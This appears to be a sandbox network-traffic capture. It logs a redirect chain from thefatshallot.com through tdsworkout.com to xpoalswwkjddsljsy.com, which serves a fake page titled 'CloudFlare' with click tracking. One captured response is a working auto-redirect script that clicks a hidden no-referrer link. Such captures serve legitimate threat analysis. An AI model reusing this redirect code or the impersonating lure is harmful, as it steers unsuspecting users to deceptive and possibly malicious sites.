accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() referrer-policy: same-origin server-timing: chlray;desc="98fdde63be1629a7" x-content-type-options: nosniff x-frame-options: SAMEORIGIN cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 expires: Thu, 01 Jan 1970 00:00:01 GMT report-to: {"endpoints":[{"url"
2025-10-17 06:51:39 UTC	628	IN	Data Raw: 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 41 37 74 33 4f 67 25 32 42 77 36 67 6b 79 6b 77 35 5a 51 6c 68 72 43 77 69 51 25 32 42 61 77 76 41 44 75 30 59 72 39 5a 41 4b 6b 5a 74 39 78 58 52 70 4f 6a 53 33 45 6d 68 73 55 49 6c 38 51 31 64 50 35 42 33 6f 38 78 64 4d 64 78 4b 52 35 57 51 79 54 49 68 41 58 73 52 75 37 67 56 69 51 79 49 6d 58 49 30 48 39 47 6d 49 71 31 50 25 32 46 78 31 66 76 48 25 32 42 39 64 6e 73 61 6e 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 6e 65 6c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 Data Ascii: :"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7t3Og%2Bw6gkykw5ZQlhrCwiQ%2BawvADu0Yr9ZAKkZt9xXRpOjS3EmhsUIl8Q1dP5B3o8xdMdxKR5WQyTIhAXsRu7gViQyImXI0H9GmIq1P%2Fx1fvH%2B9dnsano%3D"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to"
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 22 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 7d 3c 2f 73 74 79 Data Ascii: S4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+");background-repeat:no-repeat;background-size:contain;padding-left:34px}@media (prefers-color-scheme: dark){body{background-color:#222;color:#d9d9d9}}</sty
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 45 6c 6f 62 53 55 49 56 31 64 6c 42 6e 4f 70 47 45 38 52 6e 67 65 4c 35 78 39 39 75 53 6a 53 58 64 4b 66 63 6a 59 42 41 35 73 33 63 76 75 57 55 2e 72 64 48 38 6b 75 52 78 58 64 49 42 66 6a 38 31 56 6a 46 6e 4d 57 64 68 39 30 79 52 41 78 7a 38 43 72 52 73 39 4a 33 4c 74 42 46 63 74 78 71 52 36 58 4b 50 4f 33 4c 7a 46 46 2e 6c 4f 7a 64 75 45 65 44 56 4a 50 65 39 33 43 6d 72 7a 4d 31 6e 4c 46 6b 4c 55 35 53 59 37 6f 37 2e 4e 39 5a 53 71 2e 72 36 6c 32 64 77 4f 52 69 39 32 32 52 49 69 58 4f 77 70 71 49 30 4a 67 47 32 53 4c 6f 79 48 6e 66 47 59 4d 4e 5a 69 35 5f 4f 76 48 33 58 35 51 5f 55 56 57 37 57 58 34 5a 4b 64 54 41 62 6b 36 36 65 73 30 31 6e 45 4a 63 35 31 48 79 65 6b 53 4b 6e 6f 4b 49 6f 49 59 74 55 6a 56 68 73 53 4a 53 6a 36 75 73 51 4e 74 70 47 33 46 Data Ascii: ElobSUIV1dlBnOpGE8RngeL5x99uSjSXdKfcjYBA5s3cvuWU.rdH8kuRxXdIBfj81VjFnMWdh90yRAxz8CrRs9J3LtBFctxqR6XKPO3LzFF.lOzduEeDVJPe93CmrzM1nLFkLU5SY7o7.N9ZSq.r6l2dwORi922RIiXOwpqI0JgG2SLoyHnfGYMNZi5_OvH3X5Q_UVW7WX4ZKdTAbk66es01nEJc51HyekSKnoKIoIYtUjVhsSJSj6usQNtpG3F
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 47 4d 62 37 35 44 42 55 6c 2e 38 34 51 46 39 38 48 39 38 32 4b 73 77 78 42 4b 41 6e 6e 66 79 6c 64 76 4b 50 49 77 53 76 2e 6f 38 45 51 48 53 50 39 4d 62 52 4c 38 6d 61 53 4b 49 56 66 4b 2e 47 59 38 65 4b 6a 78 78 77 41 35 52 4a 6c 63 55 73 73 47 36 55 74 34 41 45 7a 55 6c 69 50 30 46 49 33 32 7a 78 72 32 47 67 41 78 77 48 66 36 6f 47 71 48 67 7a 61 44 44 70 76 4f 32 76 56 6e 79 72 74 66 46 42 66 53 75 32 42 78 47 6b 46 34 55 59 5a 39 7a 47 5f 49 57 6b 78 59 62 4c 44 4d 45 46 76 55 46 68 73 42 57 32 73 6a 31 43 39 5f 5a 4d 49 53 70 49 59 4a 53 4d 63 70 64 39 54 63 6b 73 69 44 70 4a 59 5f 6a 79 79 51 2e 4e 63 46 63 67 32 7a 5f 66 6d 67 59 51 35 73 79 6f 6a 34 46 73 42 44 55 7a 4e 4e 2e 34 45 69 48 69 51 6e 31 53 68 56 6d 66 38 30 33 67 45 53 41 36 4e 41 66 Data Ascii: GMb75DBUl.84QF98H982KswxBKAnnfyldvKPIwSv.o8EQHSP9MbRL8maSKIVfK.GY8eKjxxwA5RJlcUssG6Ut4AEzUliP0FI32zxr2GgAxwHf6oGqHgzaDDpvO2vVnyrtfFBfSu2BxGkF4UYZ9zG_IWkxYbLDMEFvUFhsBW2sj1C9_ZMISpIYJSMcpd9TcksiDpJY_jyyQ.NcFcg2z_fmgYQ5syoj4FsBDUzNN.4EiHiQn1ShVmf803gESA6NAf
2025-10-17 06:51:39 UTC	1427	IN	Data Raw: 75 4d 42 37 58 55 4f 42 6d 6c 58 5f 42 67 68 58 48 56 68 57 67 6b 31 44 44 79 70 32 78 5f 4f 71 51 47 4e 34 62 74 42 6b 63 4d 50 67 59 66 69 6a 57 58 30 4d 35 5f 2e 79 61 31 58 37 30 69 70 72 6d 57 74 48 43 66 51 4d 6a 76 71 54 69 72 36 64 64 4d 50 5a 73 61 5f 4c 4f 76 59 51 43 41 31 62 5f 76 4c 63 2e 58 6f 68 45 70 5a 71 6e 4b 76 38 44 68 4e 41 4a 44 5f 46 56 52 30 49 74 7a 32 37 77 69 59 68 6d 4c 59 35 61 6d 57 30 2e 31 6f 66 4c 4b 35 5a 33 61 36 62 4f 69 75 57 77 43 5a 52 37 73 35 79 6c 7a 70 59 49 42 6e 69 59 44 39 64 4d 37 35 30 41 4b 34 6e 61 62 65 6d 67 69 31 64 70 30 57 35 34 50 70 62 56 43 37 48 43 55 35 43 66 41 76 67 48 4e 44 61 37 49 69 61 64 6d 4c 36 6a 79 42 51 63 71 76 62 53 66 31 59 49 68 76 49 71 38 46 58 77 58 4d 36 37 64 4f 79 76 6b 49 Data Ascii: uMB7XUOBmlX_BghXHVhWgk1DDyp2x_OqQGN4btBkcMPgYfijWX0M5_.ya1X70iprmWtHCfQMjvqTir6ddMPZsa_LOvYQCA1b_vLc.XohEpZqnKv8DhNAJD_FVR0Itz27wiYhmLY5amW0.1ofLK5Z3a6bOiuWwCZR7s5ylzpYIBniYD9dM750AK4nabemgi1dp0W54PpbVC7HCU5CfAvgHNDa7IiadmL6jyBQcqvbSf1YIhvIq8FXwXM67dOyvkI

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:39 UTC	534	OUT	GET /js HTTP/1.1 host: tdsworkout.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://thefatshallot.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty referer: https://thefatshallot.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:39 UTC	397	IN	HTTP/1.1 200 OK server: nginx date: Fri, 17 Oct 2025 06:51:39 GMT content-type: text/plain; charset=utf-8 content-length: 181 cache-control: no-cache, no-store, must-revalidate expires: Fri, 17 Oct 2025 06:51:39 GMT set-cookie: e3b0c4_1=1d7r1r12e2shbl; expires=Fri, 24 Oct 2025 06:51:39 GMT; path=/; domain=tdsworkout.com; secure; httponly; samesite=none access-control-allow-origin: *
2025-10-17 06:51:39 UTC	181	IN	Data Raw: 76 61 72 20 72 65 64 69 72 65 63 74 54 6f 20 3d 20 22 68 74 74 70 73 3a 2f 2f 78 70 6f 61 6c 73 77 77 6b 6a 64 64 73 6c 6a 73 79 2e 63 6f 6d 2f 22 3b 76 61 72 20 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 61 27 29 3b 61 2e 68 72 65 66 20 3d 20 72 65 64 69 72 65 63 74 54 6f 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 72 65 6c 27 2c 20 27 6e 6f 72 65 66 65 72 72 65 72 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 61 2e 63 6c 69 63 6b 28 29 3b Data Ascii: var redirectTo = "https://xpoalswwkjddsljsy.com/";var a = document.createElement('a');a.href = redirectTo;a.setAttribute('rel', 'noreferrer');document.body.appendChild(a);a.click();

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:40 UTC	657	OUT	GET / HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	312	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 14 Oct 2025 08:27:19 GMT ETag: "174e8-6411a27036f14" Accept-Ranges: bytes Content-Length: 95464 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6c 6f 75 64 46 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>CloudFlare</title> <style> html, body { margin: 0; height: 100%; background: #000; cursor: pointer; } </style></head><body><script>(function
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 28 27 3d 27 29 5b 31 5d 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 66 75 6e 63 74 69 6f 6e 20 73 65 74 43 6f 6f 6b 69 65 28 6e 61 6d 65 2c 20 76 61 6c 75 65 2c 20 6d 61 78 41 67 65 53 65 63 6f 6e 64 73 29 20 7b 0a 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 60 24 7b 6e 61 6d 65 7d 3d 24 7b 76 61 6c 75 65 7d 3b 20 70 61 74 68 3d 2f 3b 20 6d 61 78 2d 61 67 65 3d 24 7b 6d 61 78 41 67 65 53 65 63 6f 6e 64 73 7d 60 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 63 6f 6e 73 74 20 62 61 73 65 48 72 65 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 62 61 73 65 27 29 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 68 72 65 66 27 29 20 7c 7c 20 27 2f 27 3b 0a 09 09 09 09 63 6f 6e 73 74 20 70 61 74 68 53 65 67 6d 65 Data Ascii: ('=')[1];}function setCookie(name, value, maxAgeSeconds) {document.cookie = `${name}=${value}; path=/; max-age=${maxAgeSeconds}`;}const baseHref = document.querySelector('base')?.getAttribute('href') \|\| '/';const pathSegme
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 21 63 6c 69 63 6b 53 65 6e 74 29 20 7b 0a 09 09 09 09 09 09 09 09 73 65 6e 64 53 74 61 74 28 27 63 6c 69 63 6b 27 29 3b 0a 09 09 09 09 09 09 09 09 63 6c 69 63 6b 53 65 6e 74 20 3d 20 74 72 75 65 3b 0a 09 09 09 09 09 09 09 09 73 65 74 43 6f 6f 6b 69 65 28 27 63 6c 69 63 6b 27 2c 20 27 31 27 2c 20 43 4f 4f 4b 49 45 5f 4d 41 58 5f 41 47 45 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 2c 0a 09 09 09 09 09 09 7b 20 6f 6e 63 65 3a 20 74 72 75 65 20 7d 2c 0a 09 09 09 09 09 29 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6b 65 79 64 6f 77 6e 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 76 65 6e 74 29 20 7b 0a 09 09 09 09 09 69 66 20 28 65 76 65 6e 74 2e 6b 65 79 20 3d 3d 3d 20 27 Data Ascii: !clickSent) {sendStat('click');clickSent = true;setCookie('click', '1', COOKIE_MAX_AGE);}},{ once: true },);}document.addEventListener('keydown', function (event) {if (event.key === '
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 33 35 30 70 78 29 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 70 72 65 6d 69 75 6d 2d 6d 6f 64 61 6c 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 61 2c 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 62 2c 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 64 2c 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 Data Ascii: /css" media="only screen and (min-width:1350px)"> <link rel="stylesheet" href="css/premium-modals.css" type="text/css"> <style> .igyh3avx22u41pfhylwa, .igyh3avx22u41pfhylwb, .igyh3avx22u41pfhylwd, .igyh3avx22u41pfh
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 75 2e 68 64 20 7b 20 68 65 69 67 68 74 3a 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 75 2e 68 64 20 69 66 72 61 6d 65 20 7b 20 68 65 69 67 68 74 3a 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 75 20 69 66 72 61 6d 65 20 7b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 68 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b Data Ascii: line-height: 0; } .igyh3avx22u41pfhylwu.hd { height:60px; } .igyh3avx22u41pfhylwu.hd iframe { height:60px; } .igyh3avx22u41pfhylwu iframe { margin: auto; } .igyh3avx22u41pfhylwh { padding: 0;
2025-10-17 06:51:40 UTC	580	IN	Data Raw: 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 64 2d 74 68 75 6d 62 73 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 63 20 2e 61 64 5f 74 69 74 6c 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 64 2d 74 68 75 6d 62 73 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 63 20 2e 61 64 2d 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 75 2e 68 64 20 7b 20 68 65 69 67 68 74 3a 37 36 70 78 3b 20 6d 61 72 67 69 6e 3a 61 Data Ascii: text-align: center; } .hd-thumbs .igyh3avx22u41pfhylwc .ad_title, .hd-thumbs .igyh3avx22u41pfhylwc .ad-link { display: block; } .igyh3avx22u41pfhylwu.hd { height:76px; margin:a
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 2e 69 67 79 68 33 61 76 78 32 32 75 34 31 70 66 68 79 6c 77 66 20 75 6c 20 6c 69 2e 70 73 2d 6c 69 73 74 20 7b 20 77 69 64 74 68 3a 20 31 36 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 64 69 76 2e 62 61 72 5f 62 6f 64 79 2c 20 64 69 76 2e 62 61 72 5f 62 6f 64 79 20 2a 20 20 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 74 Data Ascii: .igyh3avx22u41pfhylwf ul li.ps-list { width: 16%; } } </style> <style type="text/css">div.bar_body, div.bar_body * {display:inline-block;position:relative;margin:0;padding:0;height:20px;border:none;background:#000;font:inherit;t
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 72 5f 69 74 65 6d 73 20 64 69 76 2e 6c 69 6e 6b 73 20 64 69 76 2e 73 65 61 72 63 68 57 72 61 70 20 7b 70 61 64 64 69 6e 67 3a 31 70 78 20 35 70 78 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 20 64 69 76 2e 62 61 72 5f 62 6f 64 79 20 64 69 76 2e 62 61 72 5f 69 74 65 6d 73 20 64 69 76 2e 6c 69 6e 6b 73 20 64 69 76 2e 73 65 61 72 63 68 20 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 33 70 78 20 30 20 33 70 78 20 30 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 36 70 78 3b 68 65 69 67 68 74 3a 36 70 78 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 62 6f 72 64 65 72 Data Ascii: r_items div.links div.searchWrap {padding:1px 5px; margin:0; } div.bar_body div.bar_items div.links div.search {float:left;cursor:pointer;display:inline-block;margin:3px 0 3px 0;padding:0;width:6px;height:6px;border:2px solid #fff;position:relative;border
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 38 46 38 46 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 37 32 37 32 37 32 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 53 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 23 33 33 33 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 7d 20 64 69 76 2e 61 6c 74 65 72 6e 61 74 65 4d 65 6e 75 2c 20 64 69 76 2e 6d 6f 72 65 4d 65 6e 75 20 7b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 31 70 78 3b 20 70 61 64 64 69 6e 67 3a 34 70 78 20 32 70 78 3b 20 77 69 64 74 68 3a 31 31 35 70 78 3b 20 68 65 69 67 68 74 3a 61 75 74 6f 3b 7d 20 23 50 6f 72 6e 68 75 62 4e 65 74 77 Data Ascii: 8F8F;outline:0;background-color: #727272;color: #fff;text-align:center;textShadow:1px 1px 1px #333;line-height:16px;cursor:pointer;} div.alternateMenu, div.moreMenu { display:none; margin-top: -1px; padding:4px 2px; width:115px; height:auto;} #PornhubNetw
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 7b 20 77 69 64 74 68 3a 39 36 30 70 78 3b 7d 20 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 20 7b 20 64 69 76 2e 62 61 72 5f 62 6f 64 79 20 64 69 76 2e 62 61 72 5f 69 74 65 6d 73 20 7b 20 77 69 64 74 68 3a 31 31 31 35 70 78 3b 7d 20 7d 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 77 31 30 2d 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 66 69 78 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 Data Ascii: { width:960px;} @media only screen and (min-width: 1200px) { div.bar_body div.bar_items { width:1115px;} } </style> <link rel="stylesheet" href="css/w10-bootstrap.min.css"> <link rel="stylesheet" href="css/fix.css"> <style> * {
2025-10-17 06:51:40 UTC	509	OUT	GET /js/jquery.min.js HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	317	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:18 GMT ETag: "15d9d-64041ed4666db" Accept-Ranges: bytes Content-Length: 89501 Vary: Accept-Encoding Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/javascript
2025-10-17 06:51:40 UTC	570	OUT	GET /css/modals_commons.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
